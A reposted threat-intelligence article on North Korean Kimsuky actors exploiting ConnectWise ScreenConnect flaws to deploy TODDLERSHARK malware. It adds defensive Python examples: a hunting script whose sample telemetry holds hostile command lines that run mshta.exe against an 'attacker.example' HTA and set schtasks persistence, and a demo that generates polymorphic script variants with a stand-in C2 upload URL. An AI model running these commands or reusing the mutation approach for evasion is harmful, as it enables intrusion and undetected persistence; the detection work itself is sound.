North Korean Hackers Exploit Vulnerability to Spread New TODDLERSHARK Malware

admin, 2024-03-08 08:17:43

North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.

According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.

"The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application," security researchers Keith Wojcieszek, George Glass, and Dave Truman said.

"They then leveraged their now 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware."

The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.

Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer.

BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.

Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.

The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.
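The two behaviours described above, cmd.exe launching mshta.exe with a remote URL from a ScreenConnect session and a scheduled task used for persistence, can be hunted in process-creation telemetry. The following is an added example written for this page, not Kroll's tooling or the original article's code: it runs three rules over a handful of constructed, Sysmon-style process events. The pid/ppid/image/command-line layout, the ScreenConnect.ClientService.exe process name and the attacker.example URL are assumptions for illustration.

```python
"""Hunting rules for the ScreenConnect -> cmd.exe -> mshta.exe <URL> chain and
schtasks-based persistence.  Added example for this page; the record layout
mirrors Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine) but
every record below is constructed, and process/URL names are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe")
SHELLS = ("cmd.exe", "powershell.exe")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the newly created process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid: Dict[int, ProcEvent], pid: int, limit: int = 16) -> List[str]:
    """Image names of parent, grandparent, ... of pid (guards against pid reuse loops)."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and cur.ppid not in seen and len(chain) < limit:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(basename(cur.image))
    return chain


def analyze(events: List[ProcEvent]) -> Dict[str, List[int]]:
    """Return pids matching each rule."""
    by_pid = {e.pid: e for e in events}
    findings = {"mshta_remote": [], "screenconnect_chain": [], "schtask_script_host": []}
    for e in events:
        name = basename(e.image)
        cl = e.command_line.lower()
        # Rule 1: mshta.exe told to fetch its HTA from a URL instead of a local file
        if name == "mshta.exe" and URL_RE.search(e.command_line):
            findings["mshta_remote"].append(e.pid)
            # Rule 2: ... and launched from a shell running under a ScreenConnect process
            chain = ancestors(by_pid, e.pid)
            if any(a in SHELLS for a in chain) and any(a.startswith("screenconnect") for a in chain):
                findings["screenconnect_chain"].append(e.pid)
        # Rule 3: scheduled task whose action is a script host (persistence)
        if name == "schtasks.exe" and "/create" in cl and any(h in cl for h in SCRIPT_HOSTS):
            findings["schtask_script_host"].append(e.pid)
    return findings


# Constructed sample telemetry, not real logs.  Process names and URL are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
              "ScreenConnect.ClientService.exe"),
    ProcEvent(512, 400, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c mshta.exe http://attacker.example/r.hta'),
    ProcEvent(520, 512, r"C:\Windows\System32\mshta.exe",
              'mshta.exe http://attacker.example/r.hta'),
    ProcEvent(530, 520, r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /tn "Update" /tr "mshta.exe http://attacker.example/r.hta" /sc minute /mo 30'),
    # benign: an admin opens a local HTA from explorer
    ProcEvent(600, 50, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Tools\local.hta"),
    # benign: a scheduled task that runs a normal executable
    ProcEvent(610, 50, r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /tn Backup /tr "C:\\Tools\\backup.exe" /sc daily'),
]


if __name__ == "__main__":
    for rule, pids in analyze(SAMPLE_EVENTS).items():
        print(f"{rule}: {pids}")
```

Rule 1 fires on any mshta.exe with a URL argument and is noisy on its own in some estates; rule 2 adds the parent chain back to the remote-support agent, which is the part specific to this intrusion, and rule 3 catches the persistence step regardless of how the initial access was obtained.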

TODDLERSHARK "exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," the researchers said.
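To see why those three mutations defeat file-hash and exact-string indicators, the following added example (not TODDLERSHARK code and not from the Kroll report) generates variants of a harmless, constructed VBScript-like stub by changing the identifier, inserting junk comment lines that shift every offset, and giving each sample its own URL path. The raw SHA-256 differs for every variant, while a normalised fingerprint that strips comments, canonicalises identifiers and masks URLs stays constant. The c2.example domain and the stub's contents are assumptions.

```python
"""Hash-based IOCs versus a normalised fingerprint for a polymorphic script.
Added example: the stub below is constructed and inert, not the real malware."""
import hashlib
import random
import re

# Constructed VBScript-like stub; the identifier and URL path vary per sample.
BASE_SCRIPT = '''Dim {ident}
Set {ident} = CreateObject("WScript.Shell")
{ident}.Run "cmd /c whoami /all > %TEMP%\\out.txt", 0, True
Call Upload("{c2}/{path}")
'''


def make_variant(seed: int) -> str:
    """Apply the three mutations the report lists: new identity string,
    junk lines that move the real code, and a unique per-sample C2 URL."""
    rng = random.Random(seed)
    ident = "v" + "".join(rng.choice("abcdefghijklmnopqrstuvwxyz") for _ in range(8))
    c2 = "http://c2.example"  # assumed placeholder domain
    path = "".join(rng.choice("0123456789abcdef") for _ in range(16))
    out = []
    for line in BASE_SCRIPT.format(ident=ident, c2=c2, path=path).splitlines():
        for _ in range(rng.randint(0, 3)):  # junk comment lines before each real line
            out.append("' " + "".join(rng.choice("xyz") for _ in range(rng.randint(5, 20))))
        out.append(line)
    return "\n".join(out) + "\n"


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def normalise(script: str) -> str:
    """Strip the mutable layers: comments, blank lines, URLs and identifier names."""
    kept = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("'"):
            continue
        kept.append(re.sub(r'https?://[^"\s]+', "<URL>", line))
    text = "\n".join(kept)
    # Rename every Dim'd variable to VAR0, VAR1, ... in order of first declaration
    for i, name in enumerate(re.findall(r"\bDim\s+(\w+)", text)):
        text = re.sub(r"\b%s\b" % re.escape(name), "VAR%d" % i, text)
    return text


def behavioural_fingerprint(script: str) -> str:
    """Hash of the normalised script: stable across the mutations above."""
    return sha256(normalise(script))


if __name__ == "__main__":
    a, b = make_variant(1), make_variant(2)
    print("raw hashes equal:   ", sha256(a) == sha256(b))
    print("normalised equal:   ", behavioural_fingerprint(a) == behavioural_fingerprint(b))
    print(normalise(a))
```

The normalisation here only handles comment-style junk; junk that is syntactically live (dead assignments, unreachable branches) needs a parser-level dead-code pass, which is why behavioural telemetry such as the process chain above is usually the more robust detection for this family.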

The development comes as South Korea's National Intelligence Service (NIS) accused its northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and pilfering valuable data.

The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted internet-exposed and vulnerable servers to gain initial access, subsequently leveraging living-off-the-land (LotL) techniques rather than dropping malware in order to better evade detection.

"North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles," NIS said.


References

[1] https://thehackernews.com/2024/03/hackers-exploit-connectwise.html

Originally published by the WeChat official account 知机安全: North Korean Hackers Exploit Vulnerability to Spread New TODDLERSHARK Malware

Reposting notice (CN-SEC): please keep the link to this article: https://cn-sec.com/archives/2551215.html
